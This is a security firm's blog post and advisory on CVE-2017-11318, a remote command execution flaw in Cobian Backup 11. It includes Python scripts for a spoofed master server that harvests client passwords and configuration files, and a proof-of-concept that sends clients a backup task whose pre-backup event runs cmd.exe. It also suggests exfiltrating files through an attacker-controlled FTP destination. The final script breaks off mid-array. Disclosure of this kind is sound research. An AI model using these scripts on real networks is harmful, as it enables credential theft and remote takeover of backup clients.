BlackArrow blog header

CVE-2017-11318: RCE in Cobian Backup 11

During a Tarlogic Red Team operation, a serious vulnerability was discovered in Cobian Backup software (CVE-2017-11318) whose exploitation enabled taking the control over several machines in a corporate network.

Introduction to cobian vulnerability CVE-2017-11318

Cobian Backup is software aimed at the creation of security copies containing a great variety of options and utilities. In corporate networks, it is developed with a customers’ architecture receiving backup tasks from a master server. Password allocation is necessary in order to connect a customer to the server.

Customer connected to master server

Customer connected to master server

Briefly analyzing the protocol and how the program logic works, several deficiencies could be observed. These ones can be abused by an attacker.

Customer’s connection to the servers

First of all, we create a sniffer in order to analyze the existing traffic between the customer and the server (the service uses 16020 port by default).

Customer connection to cobian backup server

Customer connection to server

At first sight, we can understand some protocol features:

  • No encryption is used
  • Everything is a readable text (A => 0041) and it is quite clear, what makes understanding easier
  • Every information package exchanged uses the character “,” (002C) as data internal separator
  • Every package is ended with the line break sequence (000A 000D)
  • Customer is polling the server all the time (“REQUESTING” package, it would be a “ping”), and if it does not have any order waiting, the server might answer with a pong in the form of “IDLE”

Other feature that could be noticed quickly is the fact that the customer has never requested any sort of identification or credential to the server. That means, the customer is being connected blindly to the server, enabling an attacker to establish a man-in-the-middle system and seize the server. In order to prove this theory, we create a mini server en python imitating the observed behavior in Cobian Backup:

# Cobian Backup 11

import socket
import signal
import sys
from thread import *

def signal_handler(signal, frame):
        print('You pressed Ctrl+C!')
        sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)


###### Socket data
host = ''
port = 16020 #Default

###### Server Packets
idle = "490044004c0045002c002c000d000a00"
password_ok = "500041005300530057004f00520044005f004f004b002c002c000d000a00"


###### Main
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
  sock.bind((host, port))
except socket.error as msg:
  print "Error: " + str(msg) + " - " + msg[1]
  sys.exit(1)
sock.listen(10)

while 1:
  conn, addr = sock.accept()
  print "[+] New client connected from " + addr[0]

  # 1) El cliente nos manda su password
  data = conn.recv(1024).split(",")
  print " -> Machine: " + data[2]
  print " -> Encrypted Password:n" + data[1]

  # 2) Le respondemos que la password es valida
  conn.send(password_ok.decode("hex"))

  # 3) Bucle de ping-pong para mantener conectado el cliente
  while 1:	
    ping = conn.recv(1024)
    conn.send(idle.decode("hex"))

Then, it is observed how the plan has worked properly. The customer has sent the encrypted server password –although having a look diagonally and making a couple of greps to old versions source code, it seems that this is a reversible function- and additionally, the customer is kept connected until the connection is closed thanks to answering the pings.

spoofed connection to cobian backup server

Customer connecting a spoofed server

Interacting with customers

Given the fact that it is proven that we can spoof the master server, the next concern that has to be solved is the following: Could we also execute actions in customers? Let’s take as an example the action of seeing configuration.

Server requesting the configuration file to a customer

Server requesting the configuration file to a customer

Following our theory, if we send a GET_OPTIONS whenever a REQUESTING package is sent, the customer’s configuration file (cbEngine.ini) should be sent back.

# Cobian Backup 11

import socket
import signal
import sys
from thread import *

def signal_handler(signal, frame):
        print('You pressed Ctrl+C!')
        sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)


###### Socket data
host = ''
port = 16020 #Default

###### Server Packets
idle = "490044004c0045002c002c000d000a00"
password_ok = "500041005300530057004f00520044005f004f004b002c002c000d000a00"
get_options = "4700450054005f004f005000540049004f004e0053002c002c000d000a00"

###### Main
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
  sock.bind((host, port))
except socket.error as msg:
  print "Error: " + str(msg) + " - " + msg[1]
  sys.exit(1)
sock.listen(10)

while 1:
  conn, addr = sock.accept()
  print "[+] New client connected from " + addr[0]

  # 1) The client sends its password
  data = conn.recv(1024).split(",")
  print " -> Machine: " + data[2]
  print " -> Encrypted Password:n" + data[1]

  # 2) Answering with valid password message
  conn.send(password_ok.decode("hex"))

  # 3) Client sends his  REQUESTING
  ping = conn.recv(1024)	
  
  # 4) We send the GET_OPTIONS command
  conn.send(get_options.decode("hex"))

  # 5) The client should now send the cbEngine.ini content
  data = conn.recv(7000)
  print " -> Config:"

  # "," is used as a seperator
  config = data.split(",")
  for x in config[1:]:
    print x

  conn.close()

Whenever a customer is connected to us, the configuration is sent back:

Cobian Backup fake server

Our Cobian Backup false server receiving customer’s configuration.

On the other hand, please observe below customer’s logs:

Customer log

Customer log

Even though, obtaining the configuration is interesting since important FTP, domain, mail, etc. accounts may appear in order to carry out a penetration test; we want something even more conclusive.

Commands remote execution in Cobian Backup

From the master server control panel we can automatize the creation of “tasks” responsible for generating a backup according to the indicated configuration. Tasks are sent to the designated customer in the form of a template including different values –those values are the ones we have already allocated from the interface. Created tasks are stored in the DB folder. Please, find below an example of a task created from the server:

Sample of a programmed backup template

Sample of a programmed backup template

The amount of parameters is huge, highlighting the possibility of quickly configuring as destination an external FTP. For example, we could use Cobian Backup to exfiltrate sensitive files through executing a task where one of our FTP is allocated as security copy destination. This is without doubt an attractive possibility. However, when analyzing the rest of configuring parameters we discover an even more interesting fact: pre and post backup events.

Reading Cobian Backup support forum, we could see that these parameters enable, among other things, the possibility of executing external programs before and after doing a backup. Therefore, they provide the possibility of executing commands remotely in every customer.

Once again, we follow the same working model. Therefore, we create the task manually in the server in order to intercept the traffic with a sniffer. Later, we will analyze the task and try to implement it in a script in python.

Creation of a backup task in a customer

Creation of a backup task in a customer

As it can be observed, an update_list action is sent together with task parameters including name. In case we want to add a new task in order to execute our command through the events, we should copy the sample task and add the following:

EXECUTE,C:WindowsSystem32cmd.exe,

This parameter will open a window with cmd in the customer whenever this task is executed (this information could be read in Cobian Backup support forum). And, how do we indicate that we want the newly created task to be executed?

Servidor solicitando la ejecución de una tarea a un cliente

Server requesting task execution to a customer

Using “BACKUP_SELECTED”, we indicate the task name (which has been allocated in the previous phase when creating the task) we want to be executed. This small protocol abuse used by Cobian Backup is explained in a python script at the end of this page.

In case we test it:

task execution

Whenever a customer is connected to our false Cobian Backup, a backup task is sent and executed.

In the customer, it could be seen how a cmd window has emerged indicating that the program has been executed successfully:

RCE POC cmd execution

Successful concept test, a CMD has been executed in the customer.

Conclusion

One of the most important Tarlogic Red Team features is our full-time commitment in order to search vulnerabilities in software used by our customers. This results in the discovery of 0-days in many occasions. Some of the results which may seem more interesting will be included in this blog (as this post, or such as we have already done with the XSS Worm in an elder version of Tempobox OpenText, and some others will be only reported (such as vulnerabilities found in AeroAdmin and used during a pentest).

It has to be always taken into account the possibility that an attacker may use non-published vulnerabilities to compromise a machine. It is in this point where the measures implemented during the hardening should make lateral movement difficult in privilege escalation.

Discover our work and cybersecurity services at www.tarlogic.com

Original advisory – CVE-2017-11318: RCE in Cobian Backup 11


Vendor: Cobian
Product: Cobian Backup 11
Discovered by: Juan Manuel Fernandez (@TheXC3LL)

Remote Command Execution
======================

Cobian Backup 11 client allows remote attackers to add and execute new backup tasks when master server is spoofed (man-in-the-middle). Attacker can execute system commands remotely abusing pre-backup events.

#Proof of Concept

# Cobian Backup 11 - Remote Command Execution (PoC, it's only pops a cmd window in the client)
# Use a MitM to spoof server and let clients connect to you 

import socket
import signal
import sys
from thread import *

def signal_handler(signal, frame):
        print('You pressed Ctrl+C!')
        sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)


###### Socket data
host = ''
port = 16020 #Default

###### Server Packets
iddle = "490044004c0045002c002c000d000a00"

get_options = "4700450054005f004f005000540049004f004e0053002c002c000d000a00"

password_ok = "500041005300530057004f00520044005f004f004b002c002c000d000a00"

task_template = [
0x55, 0x00, 0x50, 0x00, 0x44, 0x00, 0x41, 0x00, 
0x54, 0x00, 0x45, 0x00, 0x5f, 0x00, 0x4c, 0x00, 
0x49, 0x00, 0x53, 0x00, 0x54, 0x00, 0x2c, 0x00, 
0x22, 0x00, 0x7b, 0x00, 0x31, 0x00, 0x31, 0x00, 
0x2f, 0x00, 0x2f, 0x00, 0x2c, 0x00, 0x49, 0x00, 
0x64, 0x00, 0x3d, 0x00, 0x7b, 0x00, 0x45, 0x00, 
0x37, 0x00, 0x45, 0x00, 0x43, 0x00, 0x46, 0x00, 
0x34, 0x00, 0x32, 0x00, 0x44, 0x00, 0x2d, 0x00, 
0x37, 0x00, 0x38, 0x00, 0x45, 0x00, 0x34, 0x00, 
0x2d, 0x00, 0x34, 0x00, 0x32, 0x00, 0x34, 0x00, 
0x38, 0x00, 0x2d, 0x00, 0x42, 0x00, 0x37, 0x00, 
0x45, 0x00, 0x45, 0x00, 0x2d, 0x00, 0x33, 0x00, 
0x38, 0x00, 0x39, 0x00, 0x35, 0x00, 0x33, 0x00, 
0x36, 0x00, 0x44, 0x00, 0x38, 0x00, 0x42, 0x00, 
0x44, 0x00, 0x33, 0x00, 0x38, 0x00, 0x7d, 0x00, 
0x2c, 0x00, 0x4e, 0x00, 0x61, 0x00, 0x6d, 0x00, 
0x65, 0x00, 0x3d, 0x00, 0x7b, 0x00, 0x45, 0x00, 
0x37, 0x00, 0x45, 0x00, 0x43, 0x00, 0x46, 0x00, 
0x34, 0x00, 0x32, 0x00, 0x44, 0x00, 0x2d, 0x00, 
0x37, 0x00, 0x38, 0x00, 0x45, 0x00, 0x34, 0x00, 
0x2d, 0x00, 0x34, 0x00, 0x32, 0x00, 0x34, 0x00, 
0x38, 0x00, 0x2d, 0x00, 0x42, 0x00, 0x37, 0x00, 
0x45, 0x00, 0x45, 0x00, 0x2d, 0x00, 0x33, 0x00, 
0x38, 0x00, 0x39, 0x00, 0x35, 0x00, 0x33, 0x00, 
0x36, 0x00, 0x44, 0x00, 0x38, 0x00, 0x42, 0x00, 
0x44, 0x00, 0x33, 0x00, 0x38, 0x00, 0x7d, 0x00, 
0x2c, 0x00, 0x47, 0x00, 0x72, 0x00, 0x6f, 0x00, 
0x75, 0x00, 0x70, 0x00, 0x3d, 0x00, 0x2c, 0x00, 
0x45, 0x00, 0x6e, 0x00, 0x61, 0x00, 0x62, 0x00, 
0x6c, 0x00, 0x65, 0x00, 0x64, 0x00, 0x3d, 0x00, 
0x74, 0x00, 0x72, 0x00, 0x75, 0x00, 0x65, 0x00, 
0x2c, 0x00, 0x22, 0x00, 0x22, 0x00, 0x49, 0x00, 
0x6e, 0x00, 0x63, 0x00, 0x6c, 0x00, 0x75, 0x00, 
0x64, 0x00, 0x65, 0x00, 0x20, 0x00, 0x73, 0x00, 
0x75, 0x00, 0x62, 0x00, 0x64, 0x00, 0x69, 0x00, 
0x72, 0x00, 0x65, 0x00, 0x63, 0x00, 0x74, 0x00, 
0x6f, 0x00, 0x72, 0x00, 0x69, 0x00, 0x65, 0x00, 
0x73, 0x00, 0x3d, 0x00, 0x74, 0x00, 0x72, 0x00, 
0x75, 0x00, 0x65, 0x00, 0x22, 0x00, 0x22, 0x00, 
0x2c, 0x00, 0x22, 0x00, 0x22, 0x00, 0x43, 0x00, 
0x72, 0x00, 0x65, 0x00, 0x61, 0x00, 0x74, 0x00, 
0x65, 0x00, 0x20, 0x00, 0x73, 0x00, 0x65, 0x00, 
0x70, 0x00, 0x61, 0x00, 0x72, 0x00, 0x61, 0x00, 
0x74, 0x00, 0x65, 0x00, 0x64, 0x00, 0x20, 0x00, 
0x62, 0x00, 0x61, 0x00, 0x63, 0x00, 0x6b, 0x00, 
0x75, 0x00, 0x70, 0x00, 0x73, 0x00, 0x3d, 0x00, 
0x74, 0x00, 0x72, 0x00, 0x75, 0x00, 0x65, 0x00, 
0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 0x22, 0x00, 
0x22, 0x00, 0x55, 0x00, 0x73, 0x00, 0x65, 0x00, 
0x20, 0x00, 0x61, 0x00, 0x74, 0x00, 0x74, 0x00, 
0x72, 0x00, 0x69, 0x00, 0x62, 0x00, 0x75, 0x00, 
0x74, 0x00, 0x65, 0x00, 0x73, 0x00, 0x3d, 0x00, 
0x74, 0x00, 0x72, 0x00, 0x75, 0x00, 0x65, 0x00, 
0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 0x22, 0x00, 
0x22, 0x00, 0x55, 0x00, 0x73, 0x00, 0x65, 0x00, 
0x20, 0x00, 0x56, 0x00, 0x53, 0x00, 0x43, 0x00, 
0x3d, 0x00, 0x74, 0x00, 0x72, 0x00, 0x75, 0x00, 
0x65, 0x00, 0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 
0x22, 0x00, 0x22, 0x00, 0x42, 0x00, 0x61, 0x00, 
0x63, 0x00, 0x6b, 0x00, 0x75, 0x00, 0x70, 0x00, 
0x20, 0x00, 0x74, 0x00, 0x79, 0x00, 0x70, 0x00, 
0x65, 0x00, 0x3d, 0x00, 0x30, 0x00, 0x22, 0x00, 
0x22, 0x00, 0x2c, 0x00, 0x50, 0x00, 0x72, 0x00, 
0x69, 0x00, 0x6f, 0x00, 0x72, 0x00, 0x69, 0x00, 
0x74, 0x00, 0x79, 0x00, 0x3d, 0x00, 0x30, 0x00, 
0x2c, 0x00, 0x53, 0x00, 0x6f, 0x00, 0x75, 0x00, 
0x72, 0x00, 0x63, 0x00, 0x65, 0x00, 0x3d, 0x00, 
0x2c, 0x00, 0x44, 0x00, 0x65, 0x00, 0x73, 0x00, 
0x74, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x61, 0x00, 
0x74, 0x00, 0x69, 0x00, 0x6f, 0x00, 0x6e, 0x00, 
0x3d, 0x00, 0x2c, 0x00, 0x22, 0x00, 0x22, 0x00, 
0x53, 0x00, 0x63, 0x00, 0x68, 0x00, 0x65, 0x00, 
0x64, 0x00, 0x75, 0x00, 0x6c, 0x00, 0x65, 0x00, 
0x20, 0x00, 0x74, 0x00, 0x79, 0x00, 0x70, 0x00, 
0x65, 0x00, 0x3d, 0x00, 0x31, 0x00, 0x22, 0x00, 
0x22, 0x00, 0x2c, 0x00, 0x22, 0x00, 0x22, 0x00, 
0x53, 0x00, 0x65, 0x00, 0x6c, 0x00, 0x65, 0x00, 
0x63, 0x00, 0x74, 0x00, 0x20, 0x00, 0x64, 0x00, 
0x61, 0x00, 0x79, 0x00, 0x73, 0x00, 0x20, 0x00, 
0x6f, 0x00, 0x66, 0x00, 0x20, 0x00, 0x74, 0x00, 
0x68, 0x00, 0x65, 0x00, 0x20, 0x00, 0x77, 0x00, 
0x65, 0x00, 0x65, 0x00, 0x6b, 0x00, 0x3d, 0x00, 
0x66, 0x00, 0x61, 0x00, 0x6c, 0x00, 0x73, 0x00, 
0x65, 0x00, 0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 
0x22, 0x00, 0x22, 0x00, 0x4f, 0x00, 0x72, 0x00, 
0x64, 0x00, 0x65, 0x00, 0x72, 0x00, 0x20, 0x00, 
0x6f, 0x00, 0x66, 0x00, 0x20, 0x00, 0x44, 0x00, 
0x61, 0x00, 0x79, 0x00, 0x20, 0x00, 0x6f, 0x00, 
0x66, 0x00, 0x20, 0x00, 0x74, 0x00, 0x68, 0x00, 
0x65, 0x00, 0x20, 0x00, 0x77, 0x00, 0x65, 0x00, 
0x65, 0x00, 0x6b, 0x00, 0x3d, 0x00, 0x31, 0x00, 
0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 0x22, 0x00, 
0x22, 0x00, 0x44, 0x00, 0x61, 0x00, 0x79, 0x00, 
0x20, 0x00, 0x6f, 0x00, 0x66, 0x00, 0x20, 0x00, 
0x74, 0x00, 0x68, 0x00, 0x65, 0x00, 0x20, 0x00, 
0x77, 0x00, 0x65, 0x00, 0x65, 0x00, 0x6b, 0x00, 
0x3d, 0x00, 0x31, 0x00, 0x22, 0x00, 0x22, 0x00, 
0x2c, 0x00, 0x44, 0x00, 0x61, 0x00, 0x74, 0x00, 
0x65, 0x00, 0x2f, 0x00, 0x54, 0x00, 0x69, 0x00, 
0x6d, 0x00, 0x65, 0x00, 0x3d, 0x00, 0x30, 0x00, 
0x31, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 
0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x31, 0x00, 
0x31, 0x00, 0x31, 0x00, 0x30, 0x00, 0x30, 0x00, 
0x31, 0x00, 0x30, 0x00, 0x30, 0x00, 0x31, 0x00, 
0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x30, 0x00, 
0x31, 0x00, 0x31, 0x00, 0x30, 0x00, 0x30, 0x00, 
0x30, 0x00, 0x31, 0x00, 0x30, 0x00, 0x31, 0x00, 
0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 
0x31, 0x00, 0x31, 0x00, 0x30, 0x00, 0x31, 0x00, 
0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 
0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 
0x31, 0x00, 0x30, 0x00, 0x31, 0x00, 0x31, 0x00, 
0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x31, 0x00, 
0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x31, 0x00, 
0x30, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 
0x31, 0x00, 0x31, 0x00, 0x30, 0x00, 0x2c, 0x00, 
0x22, 0x00, 0x22, 0x00, 0x44, 0x00, 0x61, 0x00, 
0x79, 0x00, 0x20, 0x00, 0x6f, 0x00, 0x66, 0x00, 
0x20, 0x00, 0x74, 0x00, 0x68, 0x00, 0x65, 0x00, 
0x20, 0x00, 0x6d, 0x00, 0x6f, 0x00, 0x6e, 0x00, 
0x74, 0x00, 0x68, 0x00, 0x3d, 0x00, 0x31, 0x00, 
0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 0x4d, 0x00, 
0x6f, 0x00, 0x6e, 0x00, 0x74, 0x00, 0x68, 0x00, 
0x3d, 0x00, 0x31, 0x00, 0x2c, 0x00, 0x54, 0x00, 
0x69, 0x00, 0x6d, 0x00, 0x65, 0x00, 0x72, 0x00, 
0x3d, 0x00, 0x31, 0x00, 0x38, 0x00, 0x30, 0x00, 
0x2c, 0x00, 0x22, 0x00, 0x22, 0x00, 0x54, 0x00, 
0x69, 0x00, 0x6d, 0x00, 0x65, 0x00, 0x72, 0x00,
0x20, 0x00, 0x66, 0x00, 0x72, 0x00, 0x6f, 0x00, 
0x6d, 0x00, 0x3d, 0x00, 0x30, 0x00, 0x31, 0x00, 
0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 
0x30, 0x00, 0x30, 0x00, 0x31, 0x00, 0x31, 0x00, 
0x31, 0x00, 0x30, 0x00, 0x30, 0x00, 0x31, 0x00, 
0x30, 0x00, 0x30, 0x00, 0x31, 0x00, 0x31, 0x00, 
0x31, 0x00, 0x31, 0x00, 0x30, 0x00, 0x31, 0x00, 
0x31, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 
0x31, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 
0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 
0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 
0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 
0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 
0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 
0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 
0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 
0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 
0x30, 0x00, 0x30, 0x00, 0x22, 0x00, 0x22, 0x00, 
0x2c, 0x00, 0x22, 0x00, 0x22, 0x00, 0x54, 0x00, 
0x69, 0x00, 0x6d, 0x00, 0x65, 0x00, 0x72, 0x00, 
0x20, 0x00, 0x74, 0x00, 0x6f, 0x00, 0x3d, 0x00, 
0x30, 0x00, 0x31, 0x00, 0x30, 0x00, 0x30, 0x00, 
0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 
0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x30, 0x00, 
0x30, 0x00, 0x31, 0x00, 0x30, 0x00, 0x30, 0x00, 
0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 
0x30, 0x00, 0x31, 0x00, 0x31, 0x00, 0x30, 0x00, 
0x30, 0x00, 0x30, 0x00, 0x31, 0x00, 0x31, 0x00, 
0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 
0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 
0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 
0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x30, 0x00, 
0x30, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 
0x31, 0x00, 0x30, 0x00, 0x31, 0x00, 0x31, 0x00, 
0x31, 0x00, 0x30, 0x00, 0x31, 0x00, 0x30, 0x00, 
0x30, 0x00, 0x30, 0x00, 0x31, 0x00, 0x31, 0x00, 
0x30, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 
0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 0x22, 0x00, 
0x22, 0x00, 0x46, 0x00, 0x75, 0x00, 0x6c, 0x00, 
0x6c, 0x00, 0x20, 0x00, 0x63, 0x00, 0x6f, 0x00, 
0x70, 0x00, 0x69, 0x00, 0x65, 0x00, 0x73, 0x00, 
0x3d, 0x00, 0x30, 0x00, 0x22, 0x00, 0x22, 0x00, 
0x2c, 0x00, 0x22, 0x00, 0x22, 0x00, 0x44, 0x00, 
0x69, 0x00, 0x66, 0x00, 0x66, 0x00, 0x65, 0x00, 
0x72, 0x00, 0x65, 0x00, 0x6e, 0x00, 0x74, 0x00, 
0x61, 0x00, 0x6c, 0x00, 0x20, 0x00, 0x63, 0x00, 
0x6f, 0x00, 0x70, 0x00, 0x69, 0x00, 0x65, 0x00, 
0x73, 0x00, 0x3d, 0x00, 0x30, 0x00, 0x22, 0x00, 
0x22, 0x00, 0x2c, 0x00, 0x22, 0x00, 0x22, 0x00, 
0x4f, 0x00, 0x6e, 0x00, 0x65, 0x00, 0x20, 0x00, 
0x66, 0x00, 0x75, 0x00, 0x6c, 0x00, 0x6c, 0x00, 
0x20, 0x00, 0x65, 0x00, 0x76, 0x00, 0x65, 0x00, 
0x72, 0x00, 0x79, 0x00, 0x3d, 0x00, 0x30, 0x00, 
0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 0x22, 0x00, 
0x22, 0x00, 0x55, 0x00,
0x73, 0x00, 0x65, 0x00, 0x20, 0x00, 0x66, 0x00, 
0x69, 0x00, 0x78, 0x00, 0x65, 0x00, 0x64, 0x00, 
0x20, 0x00, 0x64, 0x00, 0x61, 0x00, 0x79, 0x00, 
0x3d, 0x00, 0x66, 0x00, 0x61, 0x00, 0x6c, 0x00, 
0x73, 0x00, 0x65, 0x00, 0x22, 0x00, 0x22, 0x00, 
0x2c, 0x00, 0x22, 0x00, 0x22, 0x00, 0x46, 0x00, 
0x69, 0x00, 0x78, 0x00, 0x65, 0x00, 0x64, 0x00, 
0x20, 0x00, 0x64, 0x00, 0x61, 0x00, 0x79, 0x00, 
0x3d, 0x00, 0x31, 0x00, 0x22, 0x00, 0x22, 0x00, 
0x2c, 0x00, 0x43, 0x00, 0x6f, 0x00, 0x6d, 0x00, 
0x70, 0x00, 0x72, 0x00, 0x65, 0x00, 0x73, 0x00, 
0x73, 0x00, 0x69, 0x00, 0x6f, 0x00, 0x6e, 0x00, 
0x3d, 0x00, 0x30, 0x00, 0x2c, 0x00, 0x22, 0x00, 
0x22, 0x00, 0x43, 0x00, 0x6f, 0x00, 0x6d, 0x00, 
0x70, 0x00, 0x72, 0x00, 0x65, 0x00, 0x73, 0x00, 
0x73, 0x00, 0x20, 0x00, 0x69, 0x00, 0x6e, 0x00, 
0x64, 0x00, 0x69, 0x00, 0x76, 0x00, 0x69, 0x00, 
0x64, 0x00, 0x75, 0x00, 0x61, 0x00, 0x6c, 0x00, 
0x6c, 0x00, 0x79, 0x00, 0x3d, 0x00, 0x66, 0x00, 
0x61, 0x00, 0x6c, 0x00, 0x73, 0x00, 0x65, 0x00, 
0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 0x53, 0x00, 
0x70, 0x00, 0x6c, 0x00, 0x69, 0x00, 0x74, 0x00, 
0x3d, 0x00, 0x30, 0x00, 0x2c, 0x00, 0x22, 0x00, 
0x22, 0x00, 0x43, 0x00, 0x75, 0x00, 0x73, 0x00, 
0x74, 0x00, 0x6f, 0x00, 0x6d, 0x00, 0x20, 0x00, 
0x73, 0x00, 0x69, 0x00, 0x7a, 0x00, 0x65, 0x00, 
0x3d, 0x00, 0x34, 0x00, 0x33, 0x00, 0x30, 0x00, 
0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 
0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x22, 0x00, 
0x22, 0x00, 0x2c, 0x00, 0x22, 0x00, 0x22, 0x00, 
0x43, 0x00, 0x6f, 0x00, 0x6d, 0x00, 0x6d, 0x00, 
0x65, 0x00, 0x6e, 0x00, 0x74, 0x00, 0x3d, 0x00, 
0x43, 0x00, 0x6f, 0x00, 0x62, 0x00, 0x69, 0x00, 
0x61, 0x00, 0x6e, 0x00, 0x20, 0x00, 0x42, 0x00, 
0x61, 0x00, 0x63, 0x00, 0x6b, 0x00, 0x75, 0x00, 
0x70, 0x00, 0x20, 0x00, 0x31, 0x00, 0x31, 0x00, 
0x20, 0x00, 0x47, 0x00, 0x72, 0x00, 0x61, 0x00, 
0x76, 0x00, 0x69, 0x00, 0x74, 0x00, 0x79, 0x00, 
0x22, 0x00, 0x22, 0x00, 0x2c, 0x00, 0x45, 0x00, 
0x6e, 0x00, 0x63, 0x00, 0x72, 0x00, 0x79, 0x00, 
0x70, 0x00, 0x74, 0x00, 0x69, 0x00, 0x6f, 0x00, 
0x6e, 0x00, 0x3d, 0x00, 0x30, 0x00, 0x2c, 0x00, 
0x50, 0x00, 0x61, 0x00, 0x73, 0x00, 0x73, 0x00, 
0x70, 0x00, 0x68, 0x00, 0x72, 0x00, 0x61, 0x00, 
0x73, 0x00, 0x65, 0x00, 0x3d, 0x00, 0x59, 0x00, 
0x67, 0x00, 0x42, 0x00, 0x6c, 0x00, 0x41, 0x00, 
0x47, 0x00, 0x41, 0x00, 0x41, 0x00, 0x63, 0x00, 
0x51, 0x00, 0x42, 0x00, 0x33, 0x00, 0x41, 0x00, 
0x47, 0x00, 0x73, 0x00, 0x41, 0x00, 0x61, 0x00, 
0x77, 0x00, 0x42, 0x00, 0x37, 0x00, 0x41, 0x00, 
0x48, 0x00, 0x6b, 0x00, 0x41, 0x00, 0x61, 0x00, 
0x51, 0x00, 0x41, 0x00, 0x35, 0x00, 0x41, 0x00, 
0x48, 0x00, 0x77, 0x00, 0x41, 0x00, 0x42, 0x00, 
0x77, 0x00, 0x41, 0x00, 0x44, 0x00, 0x41, 0x00, 
0x41, 0x00, 0x30, 0x00, 0x41, 0x00, 0x63, 0x00, 
0x77, 0x00, 0x42, 0x00, 0x78, 0x00, 0x41, 0x00, 
0x48, 0x00, 0x55, 0x00, 0x41, 0x00, 0x65, 0x00, 
0x77, 0x00, 0x41, 0x00, 0x64, 0x00, 0x41, 0x00, 
0x42, 0x00, 0x41, 0x00, 0x41, 0x00, 0x63, 0x00, 
0x67, 0x00, 0x42, 0x00, 0x2b, 0x00, 0x41, 0x00, 
0x48, 0x00, 0x49, 0x00, 0x41, 0x00, 0x65, 0x00, 
0x51, 0x00, 0x41, 0x00, 0x45, 0x00, 0x41, 0x00, 
0x41, 0x00, 0x67, 0x00, 0x41, 0x00, 0x41, 0x00, 
0x41, 0x00, 0x42, 0x00, 0x34, 0x00, 0x41, 0x00, 
0x42, 0x00, 0x30, 0x00, 0x41, 0x00, 0x61, 0x00, 
0x51, 0x00, 0x41, 0x00, 0x4a, 0x00, 0x41, 0x00, 
0x48, 0x00, 0x4d, 0x00, 0x41, 0x00, 0x64, 0x00, 
0x77, 0x00, 0x42, 0x00, 0x6f, 0x00, 0x41, 0x00, 
0x43, 0x00, 0x77, 0x00, 0x41, 0x00, 0x43, 0x00, 
0x51, 0x00, 0x41, 0x00, 0x42, 0x00, 0x41, 0x00, 
0x48, 0x00, 0x55, 0x00, 0x41, 0x00, 0x44, 0x00, 
0x77, 0x00, 0x42, 0x00, 0x2b, 0x00, 0x41, 0x00, 
0x41, 0x00, 0x6b, 0x00, 0x41, 0x00, 0x63, 0x00, 
0x41, 0x00, 0x42, 0x00, 0x37, 0x00, 0x41, 0x00, 
0x47, 0x00, 0x4d, 0x00, 0x41, 0x00, 0x63, 0x00, 
0x77, 0x00, 0x41, 0x00, 0x44, 0x00, 0x41, 0x00, 
0x44, 0x00, 0x38, 0x00, 0x41, 0x00, 0x66, 0x00, 
0x41, 0x00, 0x41, 0x00, 0x6d, 0x00, 0x41, 0x00, 
0x41, 0x00, 0x3d, 0x00, 0x3d, 0x00, 0x2c, 0x00, 
0x45, 0x00, 0x78, 0x00, 0x63, 0x00, 0x6c, 0x00, 
0x75, 0x00, 0x73, 0x00, 0x69, 0x00, 0x6f, 0x00, 
0x6e, 0x00, 0x73, 0x00, 0x3d, 0x00, 0x2c, 0x00, 
0x49, 0x00, 0x6e, 0x00, 0x63, 0x00, 0x6c, 0x00, 
0x75, 0x00, 0x73, 0x00, 0x69, 0x00, 0x6f, 0x00, 
0x6e, 0x00, 0x73, 0x00, 0x3d, 0x00, 0x2c, 0x00, 
0x22, 0x00, 0x22, 0x00, 0x50, 0x00, 0x72, 0x00, 
0x65, 0x00, 0x20, 0x00, 0x62, 0x00, 0x61, 0x00, 
0x63, 0x00, 0x6b, 0x00, 0x75, 0x00, 0x70, 0x00, 
